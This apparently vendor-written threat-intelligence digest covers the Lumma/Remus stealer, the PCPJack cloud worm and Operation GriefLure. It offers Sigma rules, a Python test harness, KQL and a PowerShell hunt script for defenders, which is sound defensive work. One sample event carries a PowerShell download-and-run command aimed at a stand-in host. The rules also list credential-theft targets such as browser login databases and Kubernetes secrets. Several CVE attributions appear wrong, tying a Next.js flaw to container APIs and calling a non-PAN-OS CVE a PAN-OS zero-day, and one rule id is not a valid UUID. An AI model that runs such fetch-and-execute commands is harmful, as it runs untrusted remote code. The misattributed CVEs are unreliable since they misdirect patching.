Threat Summary
Recent OTX pulses reveal a convergence of sophisticated credential theft tactics spanning supply chain compromises, cloud-native worms, and targeted APT campaigns. Adversaries are actively evolving infostealers like Lumma into 64-bit variants (dubbed Remus) utilizing blockchain-based C2 channels (EtherHiding) to evade takedowns. Simultaneously, a new cloud worm dubbed PCPJack is propagating across exposed containerized infrastructure, evicting rival malware (TeamPCP) and harvesting cloud credentials. Furthermore, Operation GriefLure demonstrates a return to spear-phishing legal documents to deploy living-off-the-land binaries in targeted attacks against telecom and healthcare sectors. The collective objective across these pulses is the mass exfiltration of browser data, cryptocurrency wallets, SSH keys, and cloud API tokens.
Threat Actor / Malware Profile
Lumma Stealer (Remus Variant)
- Distribution: Primarily distributed via malicious NuGet packages typosquatting Chinese .NET libraries (e.g., packages published by `bmrxntfj`) and cracked-software sites.
- Payload Behavior: A 64-bit infostealer targeting browser credentials, cryptocurrency wallets (Exodus, Atomic), and 2FA browser extensions.
- C2 Communication: Evolves from standard HTTP/HTTPS dead-drops to EtherHiding, utilizing blockchain transactions for C2 discovery to resist infrastructure takedowns.
- Persistence: Uses scheduled tasks and registry run keys.
- Anti-Analysis: Employs .NET Reactor obfuscation, process spoofing, and anti-debugging checks specific to the Remus variant.
PCPJack
- Distribution: Exploits vulnerable Docker and Kubernetes APIs (specifically targeting CVE-2025-29927 and others).
- Payload Behavior: A credential worm designed to propagate laterally across cloud environments. It systematically removes artifacts of the TeamPCP actor before deploying its own payload.
- C2 Communication: Exfiltrates harvested cloud credentials (AWS, GCP, Azure) and developer tokens to attacker-controlled infrastructure.
- Persistence: Infects container images, host cron jobs, and Jobs within Kubernetes clusters.
Operation GriefLure
- Threat Actor: Unknown APT group targeting military telecom (Viettel) and healthcare (St. Luke's).
- Distribution: Spear-phishing emails weaponizing authentic-looking legal documents and whistleblower complaints.
- Payload Behavior: Utilizes living-off-the-land binaries (LOLBins) such as `sfsvc.exe` and a side-loaded `360.dll` to evade detection.
- Objective: Long-term espionage and credential harvesting within sensitive networks.
IOC Analysis
The provided IOCs present a mix of infrastructure and file artifacts indicative of multi-vector campaigns:
- Domains & URLs: A mix of C2 domains for infostealers (e.g., `dns-providersa2.com`, `forestoaker.com`) and credential-harvesting phishing sites (e.g., `lastpass-login-help.com`).
- File Hashes: Numerous SHA256 and MD5 hashes associated with the Remus (Lumma) variant, malicious NuGet packages, and the GriefLure payloads.
- CVEs: Specific vulnerabilities exploited by PCPJack (CVE-2025-29927, CVE-2026-1357) and the PAN-OS zero-day (CVE-2023-33538).
- Operationalization: SOC teams should immediately block the listed domains at the proxy/DNS firewall level. File hashes should be uploaded to EDR solutions for hunting. The CVEs indicate a need for immediate patching of PAN-OS firewalls and container orchestration platforms.
- Tooling: Use `nslookup` or `dig` to validate domain resolution, `curl` to check HTTP responses, and `vt-cli` or `sigmac` to correlate with existing threat intelligence feeds.
Detection Engineering
```yaml
---
title: Potential Malicious NuGet Package Execution - Supply Chain
id: 48a2d23f-8f31-4567-a23b-4e3a4125f78a
description: Detects execution of processes spawned by NuGet or dotnet tools involving typosquatted packages or suspicious child processes like obfuscated PowerShell.
status: experimental
date: 2026/05/09
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/663b1c3e9a6b4c0f8b3d1e9a
tags:
  - attack.supply_chain
  - attack.execution
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - '\nuget.exe'
      - '\dotnet.exe'
      - '\MSBuild.exe'
  selection_child:
    Image|endswith:
      - '\powershell.exe'
      - '\cmd.exe'
      - '\rundll32.exe'
    CommandLine|contains:
      - 'downloadstring'
      - 'iex'
      - 'FromBase64String'
  condition: selection_parent and selection_child
falsepositives:
  - Legitimate build scripts utilizing PowerShell for post-build steps
level: high
---
title: Credential Theft via Browser Database Access
id: b12c4d5e-6789-0123-4567-89abcdef0123
description: Detects processes attempting to access SQLite database files used by browsers to store credentials and cookies.
status: experimental
date: 2026/05/09
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/663b1c3e9a6b4c0f8b3d1e9b
tags:
  - attack.credential_access
  - attack.collection
logsource:
  category: file_access
  product: windows
detection:
  selection:
    TargetFilename|contains:
      - '\Google\Chrome\User Data\Default\Cookies'
      - '\Google\Chrome\User Data\Default\Login Data'
      - '\Mozilla\Firefox\Profiles\'
      - '\BraveSoftware\Brave-Browser\User Data\Default\Cookies'
  filter_legit:
    Image|endswith:
      - '\chrome.exe'
      - '\firefox.exe'
      - '\brave.exe'
  condition: selection and not filter_legit
falsepositives:
  - Third-party password managers performing backups
level: high
---
title: PCPJack Cloud Worm Activity - Docker Socket Mount
id: e3f7g8h9-1011-1213-1415-161718192021
description: Detects potential PCPJack worm activity characterized by suspicious Docker CLI usage mounting the Docker socket or enumerating secrets.
status: experimental
date: 2026/05/09
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/663b1c3e9a6b4c0f8b3d1e9c
tags:
  - attack.execution
  - attack.privilege_escalation
logsource:
  category: process_creation
  product: linux
detection:
  selection_docker:
    Image|endswith: '/docker'
    CommandLine|contains:
      - 'run -v /var/run/docker.sock'
      - 'inspect --format={{.HostConfig.Binds}}'
  selection_kubectl:
    Image|endswith: '/kubectl'
    CommandLine|contains:
      - 'get secrets'
      - 'get serviceaccounts'
  condition: 1 of selection_*
falsepositives:
  - Legitimate DevOps administration
level: medium
```
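The three Sigma selections above, re-implemented as plain Python so their logic can be exercised against constructed events before the rules are deployed. This is an added example, not code from the pulses or from Security Arsenal; the event field names follow the rules, and the sample events are constructed.

```python
# Added example (not from the OTX pulses or Security Arsenal): the three Sigma rules above
# re-implemented in plain Python so their selection logic can be exercised against
# constructed events before deployment. Sigma string modifiers match case-insensitively.
def _endswith(value, suffixes):
    v = (value or "").lower()
    return any(v.endswith(s.lower()) for s in suffixes)
def _contains(value, needles):
    v = (value or "").lower()
    return any(n.lower() in v for n in needles)

def nuget_supply_chain(ev):
    """condition: selection_parent and selection_child"""
    parent = _endswith(ev.get("ParentImage"), ["\\nuget.exe", "\\dotnet.exe", "\\MSBuild.exe"])
    child = (_endswith(ev.get("Image"), ["\\powershell.exe", "\\cmd.exe", "\\rundll32.exe"])
             and _contains(ev.get("CommandLine"), ["downloadstring", "iex", "FromBase64String"]))
    return parent and child

def browser_db_access(ev):
    """condition: selection and not filter_legit (the browser's own process is excluded)"""
    hit = _contains(ev.get("TargetFilename"), [
        "\\Google\\Chrome\\User Data\\Default\\Cookies", "\\Google\\Chrome\\User Data\\Default\\Login Data",
        "\\Mozilla\\Firefox\\Profiles\\", "\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Cookies"])
    legit = _endswith(ev.get("Image"), ["\\chrome.exe", "\\firefox.exe", "\\brave.exe"])
    return hit and not legit

def pcpjack_cloud_worm(ev):
    """condition: 1 of selection_*"""
    docker = (_endswith(ev.get("Image"), ["/docker"]) and _contains(ev.get("CommandLine"),
              ["run -v /var/run/docker.sock", "inspect --format={{.HostConfig.Binds}}"]))
    kubectl = (_endswith(ev.get("Image"), ["/kubectl"]) and _contains(ev.get("CommandLine"),
               ["get secrets", "get serviceaccounts"]))
    return docker or kubectl

RULES = {"nuget_supply_chain": nuget_supply_chain, "browser_db_access": browser_db_access,
         "pcpjack_cloud_worm": pcpjack_cloud_worm}
def hunt(events):
    """Return (rule_name, event id) for every event that trips a rule."""
    return [(name, ev["id"]) for ev in events for name, fn in RULES.items() if fn(ev)]

# Constructed sample telemetry (not real IOCs): one true positive per rule plus two benign events.
SAMPLE_EVENTS = [
    {"id": 1, "ParentImage": "C:\\Program Files\\dotnet\\dotnet.exe", "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd /c powershell IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"},
    {"id": 2, "Image": "C:\\Users\\dev\\AppData\\Local\\Temp\\update.exe",
     "TargetFilename": "C:\\Users\\dev\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"},
    {"id": 3, "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",  # the browser itself: filtered
     "TargetFilename": "C:\\Users\\dev\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"},
    {"id": 4, "Image": "/usr/bin/docker", "CommandLine": "docker run -v /var/run/docker.sock:/var/run/docker.sock alpine"},
    {"id": 5, "Image": "/usr/bin/kubectl", "CommandLine": "kubectl get pods -A"},  # routine administration
]
```

Running `hunt(SAMPLE_EVENTS)` returns one hit per rule (events 1, 2 and 4) and nothing for the browser's own file access or routine kubectl use, which is the behaviour the rules' filters and conditions are meant to give.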
```kql
// Hunt for Lumma/Remus and GriefLure File Hashes
let IOCs = dynamic([
    "efb675de4b3af3dac3c9cae91075fd7cc2f4f98e", "019e6c2cf58386039133981f3377b085fbd70c98ae8613c7c6a4f10a9f2d9824",
    "b037fa1dd769891b538d9ca26131890c93e3458eec96c5354bdebe50d04a5b3d", "e41c635e4c3514e266d143d544ad1abde5db3dcfe6cccdf9bb7a218003f8ab6a",
    "6c6cbed6aad96564ed87094785be07a1"
]);
DeviceProcessEvents
| where SHA1 in (IOCs) or SHA256 in (IOCs) or MD5 in (IOCs)
| project Timestamp, DeviceName, FileName, ProcessCommandLine, SHA256, InitiatingProcessFileName
| extend Alert = "Known Malicious Hash Detected"
| order by Timestamp desc
```
```powershell
# IOC Hunt Script for Lumma/PCPJack Indicators
# Requires Administrator privileges
$MaliciousHashes = @(
    "019e6c2cf58386039133981f3377b085fbd70c98ae8613c7c6a4f10a9f2d9824",
    "34e2d63b5db7e24c808711c2ca0c0a42afde97a0086d7d81609110c002d18d7c",
    "596c453c9dbb7240f1ce05cc025496524ce7c538c23a9b2171174bf32b5691a1",
    "b037fa1dd769891b538d9ca26131890c93e3458eec96c5354bdebe50d04a5b3d"
)
$C2Domains = @(
    "dns-providersa2.com",
    "forestoaker.com",
    "krondez.com",
    "lastpass-login-help.com"
)
Write-Host "[+] Scanning for Malicious File Hashes..." -ForegroundColor Cyan
# -File skips directories; the size window keeps the full-disk walk practical
Get-ChildItem -Path "C:\" -File -Recurse -ErrorAction SilentlyContinue |
    Where-Object { $_.Length -gt 0KB -and $_.Length -lt 50MB } |
    ForEach-Object {
        $hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
        # -contains is case-insensitive, so Get-FileHash's upper-case output still matches the list
        if ($hash -and $MaliciousHashes -contains $hash) {
            Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName)" -ForegroundColor Red
        }
    }
Write-Host "[+] Checking Hosts File for C2 Domains..." -ForegroundColor Cyan
$hostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
if (Test-Path $hostsPath) {
    $hostsContent = Get-Content $hostsPath
    foreach ($domain in $C2Domains) {
        # Escape the domain so its dots are matched literally rather than as regex wildcards
        if ($hostsContent -match [regex]::Escape($domain)) {
            Write-Host "[!] SUSPICIOUS ENTRY IN HOSTS FILE: $domain" -ForegroundColor Red
        }
    }
}
Write-Host "[+] Scanning for suspicious NuGet cache directories..." -ForegroundColor Cyan
$nugetPath = "$env:USERPROFILE\.nuget\packages"
if (Test-Path $nugetPath) {
    # Check for recently created packages matching typosquat patterns (heuristic)
    Get-ChildItem -Path $nugetPath -Recurse -Directory |
        Where-Object { $_.CreationTime -gt (Get-Date).AddDays(-7) } |
        Select-Object FullName, CreationTime
}
```
Response Priorities
- Immediate (0-4h): Block all identified C2 domains and IPs (`dns-providersa2.com`, `149.104.66.84`, etc.) at perimeter firewalls and proxies. Initiate a hunt for the specific file hashes provided in the pulses across all endpoints.
- 24 Hours: If credential-stealing malware (Lumma/Remus) is suspected, force a password reset for all accounts accessed from infected endpoints and invalidate session tokens. Review NuGet package sources in development environments to ensure no typosquatted packages (published by `bmrxntfj`) have been pulled.
- 1 Week: Apply patches for the PAN-OS CVE-2023-33538 and related vulnerabilities immediately. Harden Kubernetes/Docker configurations to restrict API access and prevent PCPJack propagation (disable anonymous auth, restrict RBAC).